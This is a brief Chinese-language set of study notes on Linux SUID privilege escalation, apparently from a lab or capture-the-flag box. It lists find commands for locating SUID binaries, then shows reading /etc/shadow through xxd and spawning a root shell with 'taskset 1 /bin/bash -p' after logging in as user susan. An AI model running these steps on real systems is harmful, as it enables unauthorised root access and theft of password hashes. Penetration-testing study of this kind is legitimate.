Linux suid 提权

SUID查询网站：https://gtfobins.github.io/

原理参考：http://www.hackdig.com/05/hack-351745.htm

suid可以让文件调用者暂时获得文件拥有者的权限，suid提权的思路让普通用户运行root用户所拥有的suid文件，从而达到提权的目的。

chmod u+s filename   设置SUID位

chmod u-s filename   去掉SUID设置

1.查询设置了SUID权限的可执行文件

查看机器上具有SUID权限的命令，任意一个即可

find / -user root -perm -4000 -print 2>/dev/null

find / -perm -u=s -type f 2>/dev/null

find / -user root -perm -4000 -exec ls -ldb {} ;

-user 指定文件拥有者

-perm 文件权限

-exec 执行系统命令

找到xxd 和 taskset

xxd 只可以使用 susan 用户

taskset 可以使用 susan 和 bob 用户

itservices组具有执行权限，通过/etc/group发现susan用户属于itservices用户组，利用4.隐藏文件发现的密码登录susan用户，进行提权

xxd访问/etc/shadow

xxd "/etc/shadow" |xxd -r

taskset执行bash

#执行/bin/bash
taskset 1 /bin/bash -p